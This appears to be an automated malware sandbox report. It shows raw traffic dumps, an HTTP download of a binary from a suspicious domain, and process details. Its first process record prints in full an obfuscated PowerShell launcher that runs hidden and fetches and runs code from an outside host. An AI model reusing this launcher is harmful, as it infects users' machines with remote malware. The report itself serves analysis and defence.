                                                                                                                          2024-11-08 09:59:41 UTC1369INData Raw: 20 55 21 e3 68 ab f0 c9 4f ef 08 20 68 ad 25 b8 b1 78 20 68 ad 2d a9 b1 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 72 ef 08 20 68 ad 25 ab b1 78 20 68 ad 2d 5c b1 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 15 ef 08 20 68 ad 25 5e b1 78 20 68 ad 2d 4f b1 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 38 ef 08 20 68 ad 25 59 b1 78 20 68 ad 2d 4a b1 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 db ee 08 20 68 ad 25 54 b1 78 20 68 ad 2d 45 b1 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 fe ee 08 20 68 ad 25 cf b1 78 20 68 ad 2d c0 b1 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 e1 ee 08 20 68 ad 25 ca b1 78 20 68 ad 2d fb b1 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 84 ee 08 20 68 ad 25 c5 b1 78 20 68 ad 2d f6 b1 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 a7 ee 08 20 68 ad 25 08 b2 78 20 68 ad 2d 39
                                                                                                                          Data Ascii: U!hO h%x h-x h U!hr h%x h-\x h U!h h%^x h-Ox h U!h8 h%Yx h-Jx h U!h h%Tx h-Ex h U!h h%x h-x h U!h h%x h-x h U!h h%x h-x h U!h h%x h-9
                                                                                                                          2024-11-08 09:59:41 UTC516INData Raw: ab 20 68 ad 2d 71 a2 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 ca e9 08 20 68 ad 25 7b 2f 86 20 68 ab 20 68 ad 2d 19 a2 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 ea e9 08 20 68 ad 25 5b 2f 86 20 68 ab 20 68 ad 2d 19 a2 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 8a e9 08 20 68 ad 25 43 2f 86 20 68 ab 20 68 ad 2d 01 a2 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 aa e9 08 20 68 ad 25 6b 2f 86 20 68 ab 20 68 ad 2d 19 a2 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 4a e9 08 20 68 ad 25 63 2f 86 20 68 ab 20 68 ad 2d 71 a2 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 6a e9 08 20 68 ad 25 0b 2f 86 20 68 ab 20 68 ad 2d 19 a2 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 0a e9 08 20 68 ad 25 3b 2f 86 20 68 ab 20 68 ad 2d 11 a2 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 2a e9 08 20 68 ad 25 23 2f 86 20
                                                                                                                          Data Ascii: h-qx h U!h h%{/ h h-x h U!h h%[/ h h-x h U!h h%C/ h h-x h U!h h%k/ h h-x h U!hJ h%c/ h h-qx h U!hj h%/ h h-x h U!h h%;/ h h-x h U!h* h%#/
                                                                                                                          2024-11-08 09:59:41 UTC1369INData Raw: 2d e9 a1 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 ca e7 08 20 68 ad 25 53 2e 86 20 68 ab 20 68 ad 2d e1 a1 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 ea e7 08 20 68 ad 25 5b 2e 86 20 68 ab 20 68 ad 2d e1 a1 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 8a e7 08 20 68 ad 25 43 2e 86 20 68 ab 20 68 ad 2d 91 a1 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 aa e7 08 20 68 ad 25 43 2e 86 20 68 ab 20 68 ad 2d b1 a2 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 4a e7 08 20 68 ad 25 6b 2e 86 20 68 ab 20 68 ad 2d 59 a2 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 6a e7 08 20 68 ad 25 13 2e 86 20 68 ab 20 68 ad 2d 41 a2 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 0a e7 08 20 68 ad 25 3b 2e 86 20 68 ab 20 68 ad 2d 69 a2 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 2a e7 08 20 68 ad 25 2b 2e 86 20 68 ab 20 68
                                                                                                                          Data Ascii: -x h U!h h%S. h h-x h U!h h%[. h h-x h U!h h%C. h h-x h U!h h%C. h h-x h U!hJ h%k. h h-Yx h U!hj h%. h h-Ax h U!h h%;. h h-ix h U!h* h%+. h h
                                                                                                                          2024-11-08 09:59:41 UTC1369INData Raw: 86 20 68 ab 20 68 ad 2d d9 5f 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 aa e2 08 20 68 ad 25 eb 2b 86 20 68 ab 20 68 ad 2d c1 5f 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 4a e2 08 20 68 ad 25 93 2b 86 20 68 ab 20 68 ad 2d e9 5f 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 6a e2 08 20 68 ad 25 bb 2b 86 20 68 ab 20 68 ad 2d 91 5f 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 0a e2 08 20 68 ad 25 a3 2b 86 20 68 ab 20 68 ad 2d b9 5f 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 2a e2 08 20 68 ad 25 4b 2b 86 20 68 ab 20 68 ad 2d a1 5f 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 ca e1 08 20 68 ad 25 43 2b 86 20 68 ab 20 68 ad 2d a1 5f 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 ea e1 08 20 68 ad 25 6b 2b 86 20 68 ab 20 68 ad 2d 49 5f 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 8a e1 08 20 68 ad 25 13
                                                                                                                          Data Ascii: h h-_x h U!h h%+ h h-_x h U!hJ h%+ h h-_x h U!hj h%+ h h-_x h U!h h%+ h h-_x h U!h* h%K+ h h-_x h U!h h%C+ h h-_x h U!h h%k+ h h-I_x h U!h h%
                                                                                                                          2024-11-08 09:59:41 UTC158INData Raw: 08 20 68 ad 25 0b 29 86 20 68 ab 20 68 ad 2d d9 5d 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 0a 9d 08 20 68 ad 25 03 29 86 20 68 ab 20 68 ad 2d 21 5e 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 2a 9d 08 20 68 ad 25 2b 29 86 20 68 ab 20 68 ad 2d 29 5e 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 ca 9c 08 20 68 ad 25 d3 28 86 20 68 ab 20 68 ad 2d 21 5e 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 ea 9c 08 20 68 ad 25 fb 28 86 20 68 ab 20 68 ad 2d c9 5d 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9
                                                                                                                          Data Ascii: h%) h h-]x h U!h h%) h h-!^x h U!h* h%+) h h-)^x h U!h h%( h h-!^x h U!h h%( h h-]x h U!h
                                                                                                                          2024-11-08 09:59:41 UTC1369INData Raw: 8a 9c 08 20 68 ad 25 e3 28 86 20 68 ab 20 68 ad 2d c1 5d 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 aa 9c 08 20 68 ad 25 93 28 86 20 68 ab 20 68 ad 2d e9 5d 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 4a 9c 08 20 68 ad 25 93 28 86 20 68 ab 20 68 ad 2d d1 5d 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 6a 9c 08 20 68 ad 25 bb 28 86 20 68 ab 20 68 ad 2d c1 5d 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 0a 9c 08 20 68 ad 25 a3 28 86 20 68 ab 20 68 ad 2d e9 5d 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 2a 9c 08 20 68 ad 25 4b 28 86 20 68 ab 20 68 ad 2d 91 5d 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 ca 9b 08 20 68 ad 25 73 28 86 20 68 ab 20 68 ad 2d 99 5d 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 ea 9b 08 20 68 ad 25 1b 28 86 20 68 ab 20 68 ad 2d 89 5d 78 20 68 a3 19 20 55 21 e3 68 ab f0
                                                                                                                          Data Ascii: h%( h h-]x h U!h h%( h h-]x h U!hJ h%( h h-]x h U!hj h%( h h-]x h U!h h%( h h-]x h U!h* h%K( h h-]x h U!h h%s( h h-]x h U!h h%( h h-]x h U!h
                                                                                                                          2024-11-08 09:59:41 UTC1369INData Raw: 55 21 e3 68 ab f0 c9 6a 97 08 20 68 ad 25 cb 25 86 20 68 ab 20 68 ad 2d e1 5b 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 0a 97 08 20 68 ad 25 f3 25 86 20 68 ab 20 68 ad 2d 89 5b 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 2a 97 08 20 68 ad 25 eb 25 86 20 68 ab 20 68 ad 2d 81 5b 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 ca 96 08 20 68 ad 25 db 25 86 20 68 ab 20 68 ad 2d a9 5b 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 ea 96 08 20 68 ad 25 c3 25 86 20 68 ab 20 68 ad 2d 51 5b 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 8a 96 08 20 68 ad 25 f3 25 86 20 68 ab 20 68 ad 2d 79 5b 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 aa 96 08 20 68 ad 25 fb 25 86 20 68 ab 20 68 ad 2d 61 5b 78 20 68 a3 19 20 55 21 e3 68 ab f0 c9 4a 96 08 20 68 ad 25 e3 25 86 20 68 ab 20 68 ad 2d 11 5b 78 20 68 a3 19
                                                                                                                          Data Ascii: U!hj h%% h h-[x h U!h h%% h h-[x h U!h* h%% h h-[x h U!h h%% h h-[x h U!h h%% h h-Q[x h U!h h%% h h-y[x h U!h h%% h h-a[x h U!hJ h%% h h-[x h


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          21192.168.11.3049760172.67.137.62443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 10:00:21 UTC76OUTGET /StaticFile/TermServiceTryRun/53 HTTP/1.1
                                                                                                                          Host: uyt1n8ded9fb380.com
                                                                                                                          2024-11-08 10:00:21 UTC1109INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 08 Nov 2024 10:00:21 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 2183168
                                                                                                                          Connection: close
                                                                                                                          content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                                          hash: BFF2365257251B6BA227A5E748DBD62E
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r3RyUKhKkiaArYQdp7hfiNJmVZaEG%2FWUcm8hdAAsxdx8I3Kyqf8V%2FW26107GeJ4sb%2FNhrWZNmImhcpyCqJP%2FpOWg2CCuCTYg%2FmmzSk105T%2FHjtqcLf6aY07izP5vmSG%2FwTFTj%2B6KgCWk"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8853&sent=4834&recv=2318&lost=0&retrans=0&sent_bytes=6798992&recv_bytes=19339&delivery_rate=42514204&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8df4b72c8e7341bb-EWR
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=102731&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=714&delivery_rate=37274&cwnd=237&unsent_bytes=0&cid=997463ab0099e9d4&ts=592&x=0"
                                                                                                                          2024-11-08 10:00:21 UTC260INData Raw: 78 6f 65 35 37 35 35 35 31 35 3a 35 ca ca 35 35 8d 35 35 35 35 35 35 35 75 35 2f 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 34 35 35 8f 25 35 3b 2a 81 3c f8 14 8d 34 79 f8 14 a5 a5 61 5d 5c 46 15 45 47 5a 52 47 54 58 15 58 40 46 41 15 57 50 15 47 40 5b 15 40 5b 51 50 47 15 62 5c 5b 06 07 38 3f 11 02 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35
                                                                                                                          Data Ascii: xoe5755515:5555555555u5/5555555555555555555555555555555555455%5;*<4ya]\FEGZRGTXX@FAWPG@[@[QPGb\[8?555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555
                                                                                                                          2024-11-08 10:00:21 UTC1369INData Raw: 79 34 3e 35 01 6d db 53 35 35 35 35 35 35 35 35 d5 35 37 34 3e 34 37 2c 35 39 3b 35 35 75 26 35 35 35 35 35 49 38 3b 35 35 25 35 35 35 05 3b 35 35 35 75 35 35 25 35 35 35 37 35 35 33 35 35 35 35 35 35 35 33 35 35 35 35 35 35 35 35 05 17 35 35 31 35 35 35 35 35 35 36 35 75 b4 35 35 25 35 35 75 35 35 35 35 25 35 35 25 35 35 35 35 35 35 25 35 35 35 35 25 3a 35 44 35 35 35 35 d5 3b 35 31 24 35 35 35 a5 25 35 35 a9 24 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 75 3a 35 39 7e 34 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 05 3a 35 2d 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 3d d6 3b 35 a5 37 35 35 35 35 3a 35 53 37 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 1b 41 50 4d 41 35 35 35 15 d3 38
                                                                                                                          Data Ascii: y4>5mS55555555574>47,59;55u&55555I8;55%555;555u55%5557553555555535555555555155555565u55%55u5555%55%555555%5555%:5D5555;51$555%55$555555555555555555u:59~455555555555555555555555555:5-5555555555555555555=;575555:5S7555555555555555555APMA5558
                                                                                                                          2024-11-08 10:00:21 UTC1369INData Raw: 3d 62 5a 47 51 77 5a 5a 59 37 35 35 35 b5 ca ca ca 4a 6d 27 75 35 30 73 54 59 46 50 31 61 47 40 50 33 66 4c 46 41 50 58 37 35 35 b9 27 75 35 36 3d 79 5a 5b 52 77 5a 5a 59 31 35 35 35 b5 ca ca ca 4a bd 27 75 35 30 73 54 59 46 50 31 61 47 40 50 33 66 4c 46 41 50 58 37 35 35 89 27 75 35 27 33 46 41 47 5c 5b 52 37 35 35 35 f9 27 75 35 3e 3f 62 5c 51 50 66 41 47 5c 5b 52 37 35 35 35 d5 27 75 35 3f 3f 74 5b 46 5c 66 41 47 5c 5b 52 35 35 37 35 c1 27 75 35 39 32 63 54 47 5c 54 5b 41 37 35 35 31 26 75 35 39 3f 7a 59 50 63 54 47 5c 54 5b 41 37 35 35 35 2d 26 75 35 26 33 61 76 59 54 46 46 a9 2a 75 35 37 35 35 35 19 26 75 35 34 32 7d 67 70 66 60 79 61 31 35 35 35 b5 ca ca ca 4a 37 35 71 26 75 35 3b 30 61 72 60 7c 71 25 35 35 35 35 35 35 35 35 31 35 35 35 d1 25 75 35
                                                                                                                          Data Ascii: =bZGQwZZY7555Jm'u50sTYFP1aG@P3fLFAPX755'u56=yZ[RwZZY1555J'u50sTYFP1aG@P3fLFAPX755'u5'3FAG\[R7555'u5>?b\QPfAG\[R7555'u5??t[F\fAG\[R5575'u592cTG\T[A7551&u59?zYPcTG\T[A7555-&u5&3avYTFF*u57555&u542}gpf`ya1555J75q&u5;0ar`|q%555555551555%u5
                                                                                                                          2024-11-08 10:00:21 UTC1369INData Raw: c1 ca e2 2c 75 35 76 35 c1 ca 25 2f 75 35 76 35 c1 ca 0e 2f 75 35 76 35 c1 ca 51 2f 75 35 76 35 c1 ca a5 2f 75 35 76 35 c1 ca f9 2f 75 35 76 35 c1 ca 32 2e 75 35 76 35 c1 ca 77 2e 75 35 76 35 c1 ca bd 2e 75 35 76 35 c1 ca f0 2e 75 35 77 35 c1 ca ca 2e 75 35 77 35 c1 ca 0c 29 75 35 77 35 c1 ca 4a 29 75 35 76 35 c1 ca 88 29 75 35 76 35 c1 ca db 29 75 35 76 35 c1 ca 14 28 75 35 76 35 c1 ca 60 28 75 35 7f 35 c0 ca bd 28 75 35 7f 35 c3 ca 86 28 75 35 7f 35 c2 ca d3 28 75 35 7f 35 cd ca 74 2b 75 35 7f 35 cc ca 47 2b 75 35 7f 35 cf ca 96 2b 75 35 7f 35 ce ca e9 2b 75 35 7f 35 c9 ca 2e 2a 75 35 7e 35 c8 ca 73 2a 75 35 7f 35 cb ca 47 2a 75 35 78 35 ca ca 35 35 32 61 7a 57 5f 50 56 41 13 35 e5 bb 75 35 33 76 47 50 54 41 50 36 35 35 35 35 35 3d 35 34 3d a9 2a 75 35
                                                                                                                          Data Ascii: ,u5v5%/u5v5/u5v5Q/u5v5/u5v5/u5v52.u5v5w.u5v5.u5v5.u5w5.u5w5)u5w5J)u5v5)u5v5)u5v5(u5v5`(u55(u55(u55(u55t+u55G+u55+u55+u55.*u5~5s*u55G*u5x5552azW_PVA5u53vGPTAP655555=54=*u5
                                                                                                                          2024-11-08 10:00:21 UTC516INData Raw: 50 59 53 37 35 75 8d 27 75 35 34 35 34 34 37 35 37 35 01 35 0d a4 75 35 3c 60 5b 5c 41 66 56 5a 45 50 36 35 8d 27 75 35 3d 35 37 35 35 35 35 35 35 35 31 66 50 59 53 37 35 75 8d 27 75 35 34 35 34 34 37 35 37 35 06 35 29 a5 75 35 33 70 44 40 54 59 46 36 35 35 25 75 35 3d 35 37 3d a9 2a 75 35 35 35 31 66 50 59 53 37 35 3d a9 2a 75 35 34 35 36 7a 57 5f 37 35 37 35 1e 35 11 a5 75 35 3e 72 50 41 7d 54 46 5d 76 5a 51 50 36 35 a9 25 75 35 3d 35 34 3d a9 2a 75 35 35 35 31 66 50 59 53 37 35 37 35 06 35 39 a6 75 35 3d 61 5a 66 41 47 5c 5b 52 36 35 8d 27 75 35 3d 35 37 3d a9 2a 75 35 35 35 31 66 50 59 53 37 35 75 8d 27 75 35 34 35 34 34 37 35 37 35 6e 35 31 a6 75 35 24 66 54 53 50 76 54 59 59 70 4d 56 50 45 41 5c 5a 5b 36 35 1d 26 75 35 3d 35 36 3d a9 2a 75 35 35 35
                                                                                                                          Data Ascii: PYS75u'u5454475755u5<`[\AfVZEP65'u5=5755555551fPYS75u'u5454475755)u53pD@TYF655%u5=57=*u5551fPYS75=*u5456zW_75755u5>rPA}TF]vZQP65%u5=54=*u5551fPYS757559u5=aZfAG\[R65'u5=57=*u5551fPYS75u'u545447575n51u5$fTSPvTYYpMVPEA\Z[65&u5=56=*u555
                                                                                                                          2024-11-08 10:00:21 UTC1369INData Raw: 46 54 52 50 37 35 37 35 1e 35 d9 b8 75 35 3e 7b 50 42 7c 5b 46 41 54 5b 56 50 36 35 a9 2a 75 35 3d 35 34 35 35 35 35 35 35 35 31 66 50 59 53 37 35 37 35 19 35 31 bb 75 35 39 73 47 50 50 7c 5b 46 41 54 5b 56 50 36 35 35 35 35 35 3d 35 34 3d a9 2a 75 35 35 35 31 66 50 59 53 37 35 37 35 12 35 c5 bb 75 35 32 71 50 46 41 47 5a 4c 36 35 35 35 35 35 3d 35 34 3d a9 2a 75 35 35 35 31 66 50 59 53 37 35 37 35 35 35 35 95 2a 75 35 32 32 61 7a 57 5f 50 56 41 49 22 75 35 35 35 35 35 35 35 33 66 4c 46 41 50 58 35 35 35 35 37 35 35 35 35 35 29 15 75 35 35 35 35 35 35 35 35 35 35 35 35 35 0d 15 75 35 35 35 35 35 29 15 75 35 35 35 35 35 17 15 75 35 3d 35 35 35 11 22 75 35 29 a5 75 35 11 a5 75 35 39 a6 75 35 31 a6 75 35 11 a6 75 35 1d a6 75 35 19 a6 75 35 15 a6 75 35 d9 b8
                                                                                                                          Data Ascii: FTRP75755u5>{PB|[FAT[VP65*u5=5455555551fPYS757551u59sGPP|[FAT[VP655555=54=*u5551fPYS75755u52qPFAGZL655555=54=*u5551fPYS7575555*u522azW_PVAI"u55555553fLFAPX5555755555)u5555555555555u55555)u55555u5=555"u5)u5u59u51u5u5u5u5u5
                                                                                                                          2024-11-08 10:00:21 UTC1369INData Raw: 47 35 35 35 35 35 35 35 37 35 3d 01 a3 75 35 31 70 4d 5c 41 35 35 35 35 35 35 35 37 35 35 35 35 a5 11 75 35 3b 3d 61 78 5a 5b 5c 41 5a 47 29 35 35 35 35 35 35 35 35 32 35 35 35 a9 25 75 35 35 35 35 35 35 3f 73 79 5a 56 5e 76 5a 40 5b 41 39 35 05 17 75 35 e5 bb 75 35 35 35 a9 25 75 35 31 35 35 35 35 3a 73 67 50 56 40 47 46 5c 5a 5b 76 5a 40 5b 41 37 35 d1 25 75 35 3d 35 35 35 35 38 73 7a 42 5b 5c 5b 52 61 5d 47 50 54 51 37 35 35 24 75 35 39 35 35 35 35 3f 73 79 5a 56 5e 70 43 50 5b 41 37 35 a9 25 75 35 25 35 35 35 35 3f 73 66 45 5c 5b 76 5a 40 5b 41 37 35 a9 16 75 35 21 35 35 35 35 3f 73 62 54 5c 41 64 40 50 40 50 37 35 1d 11 75 35 2d 35 35 35 35 3f 73 64 40 50 40 50 79 5a 56 5e 37 35 37 35 3c 35 3c 55 a8 75 35 39 66 50 41 66 45 5c 5b 76 5a 40 5b 41 35 35
                                                                                                                          Data Ascii: G555555575=u51pM\A555555575555u5;=axZ[\AZG)555555552555%u555555?syZV^vZ@[A95u5u555%u515555:sgPV@GF\Z[vZ@[A75%u5=55558szB[\[Ra]GPTQ755$u595555?syZV^pCP[A75%u5%5555?sfE\[vZ@[A75u5!5555?sbT\Ad@P@P75u5-5555?sd@P@PyZV^7575<5<Uu59fPAfE\[vZ@[A55
                                                                                                                          2024-11-08 10:00:21 UTC1369INData Raw: 35 35 35 35 35 35 35 05 1f 75 35 35 35 35 35 21 1f 75 35 35 35 35 35 2f 1f 75 35 39 35 35 35 11 22 75 35 29 a5 75 35 11 a5 75 35 39 a6 75 35 31 a6 75 35 11 a6 75 35 1d a6 75 35 19 a6 75 35 15 a6 75 35 d9 b8 75 35 31 bb 75 35 c5 bb 75 35 35 35 35 35 35 35 24 61 7b 5a 67 50 53 76 5a 40 5b 41 7a 57 5f 50 56 41 05 1f 75 35 32 24 61 7b 5a 67 50 53 76 5a 40 5b 41 7a 57 5f 50 56 41 21 1f 75 35 a9 2a 75 35 35 35 33 66 4c 46 41 50 58 35 35 35 35 37 35 35 35 55 1f 75 35 21 39 65 66 5d 5a 47 41 66 41 47 5c 5b 52 d1 24 75 35 37 35 4d 1f 75 35 3f 3f 60 61 73 0d 66 41 47 5c 5b 52 dc c8 37 35 b9 1f 75 35 3f 38 67 54 42 77 4c 41 50 66 41 47 5c 5b 52 ca ca 37 35 35 91 1f 75 35 21 30 65 77 4c 41 50 81 25 75 35 37 35 35 35 35 8d 1f 75 35 21 33 65 7c 5b 41 03 01 21 24 75 35
                                                                                                                          Data Ascii: 5555555u55555!u55555/u59555"u5)u5u59u51u5u5u5u5u5u51u5u5555555$a{ZgPSvZ@[AzW_PVAu52$a{ZgPSvZ@[AzW_PVA!u5*u5553fLFAPX55557555Uu5!9ef]ZGAfAG\[R$u575Mu5??`asfAG\[R75u5?8gTBwLAPfAG\[R755u5!0ewLAP%u575555u5!3e|[A!$u5
                                                                                                                          2024-11-08 10:00:21 UTC1369INData Raw: 51 46 37 35 35 35 35 35 37 35 35 35 37 33 63 77 4c 41 50 46 37 35 35 35 35 35 35 35 35 35 37 32 67 54 42 71 54 41 54 37 35 37 35 35 35 35 65 1a 75 35 36 3c 61 61 4c 45 50 7e 5c 5b 51 34 35 35 35 35 23 35 35 35 79 1a 75 35 3c 41 5e 60 5b 5e 5b 5a 42 5b 3c 41 5e 7c 5b 41 50 52 50 47 33 41 5e 76 5d 54 47 38 41 5e 70 5b 40 58 50 47 54 41 5c 5a 5b 32 41 5e 73 59 5a 54 41 3d 41 5e 66 41 47 5c 5b 52 30 41 5e 66 50 41 32 41 5e 76 59 54 46 46 3d 41 5e 78 50 41 5d 5a 51 32 41 5e 62 76 5d 54 47 3c 41 5e 79 66 41 47 5c 5b 52 3c 41 5e 62 66 41 47 5c 5b 52 3c 41 5e 63 54 47 5c 54 5b 41 32 41 5e 74 47 47 54 4c 3d 41 5e 67 50 56 5a 47 51 3e 41 5e 7c 5b 41 50 47 53 54 56 50 32 41 5e 7c 5b 41 03 01 3f 41 5e 71 4c 5b 74 47 47 54 4c 3c 41 5e 60 66 41 47 5c 5b 52 3f 41 5e 76
                                                                                                                          Data Ascii: QF755555755573cwLAPF755555555572gTBqTAT7575555eu56<aaLEP~\[Q45555#555yu5<A^`[^[ZB[<A^|[APRPG3A^v]TG8A^p[@XPGTA\Z[2A^sYZTA=A^fAG\[R0A^fPA2A^vYTFF=A^xPA]ZQ2A^bv]TG<A^yfAG\[R<A^bfAG\[R<A^cTG\T[A2A^tGGTL=A^gPVZGQ>A^|[APGSTVP2A^|[A?A^qL[tGGTL<A^`fAG\[R?A^v
                                                                                                                          2024-11-08 10:00:21 UTC1369INData Raw: ca 63 0a 75 35 76 35 c1 ca 9c 0a 75 35 76 35 c1 ca c9 0a 75 35 76 35 c1 ca 78 75 75 35 76 35 c1 ca a7 75 75 35 76 35 c1 ca ed 75 75 35 76 35 c1 ca 2b 74 75 35 76 35 c1 ca 51 74 75 35 76 35 c1 ca 9d 74 75 35 76 35 c1 ca c3 74 75 35 76 35 c1 ca 19 77 75 35 76 35 c1 ca 51 77 75 35 76 35 c1 ca 95 77 75 35 76 35 c1 ca ee 77 75 35 76 35 c1 ca 2c 76 75 35 76 35 c1 ca 5c 76 75 35 76 35 c1 ca 9f 76 75 35 76 35 c1 ca d3 76 75 35 76 35 c1 ca 01 71 75 35 76 35 c1 ca 47 71 75 35 76 35 c1 ca 9b 71 75 35 76 35 c1 ca 36 70 75 35 76 35 c1 ca 5f 70 75 35 76 35 c1 ca f7 70 75 35 76 35 c1 ca 22 73 75 35 76 35 c1 ca b0 73 75 35 76 35 c1 ca d1 73 75 35 76 35 c1 ca 75 72 75 35 76 35 c1 ca 93 72 75 35 76 35 c1 ca 2b 7d 75 35 76 35 c1 ca a4 7d 75 35 76 35 c1 ca 23 7c 75 35 76 35
                                                                                                                          Data Ascii: cu5v5u5v5u5v5xuu5v5uu5v5uu5v5+tu5v5Qtu5v5tu5v5tu5v5wu5v5Qwu5v5wu5v5wu5v5,vu5v5\vu5v5vu5v5vu5v5qu5v5Gqu5v5qu5v56pu5v5_pu5v5pu5v5"su5v5su5v5su5v5uru5v5ru5v5+}u5v5}u5v5#|u5v5


                                                                                                                          Statistics

                                                                                                                          CPU Usage

                                                                                                                          Click to jump to process

                                                                                                                          Memory Usage

                                                                                                                          Click to jump to process

                                                                                                                          High Level Behavior Distribution

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Behavior

                                                                                                                          Click to jump to process

                                                                                                                          System Behavior

                                                                                                                          General

                                                                                                                          Target ID:0
                                                                                                                          Start time:04:58:06
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /v /k "s^t^ar^t /MIn "" POwE^R^shELL -W h^I^D^D^E^n -nO^l^ogo -nO^p -Ep B^yp^a^s^S -ENCO^ded^Com^m^a^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA="" && exit
                                                                                                                          Imagebase:0x7ff614290000
                                                                                                                          File size:289'792 bytes
                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:1
                                                                                                                          Start time:04:58:06
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7d0fb0000
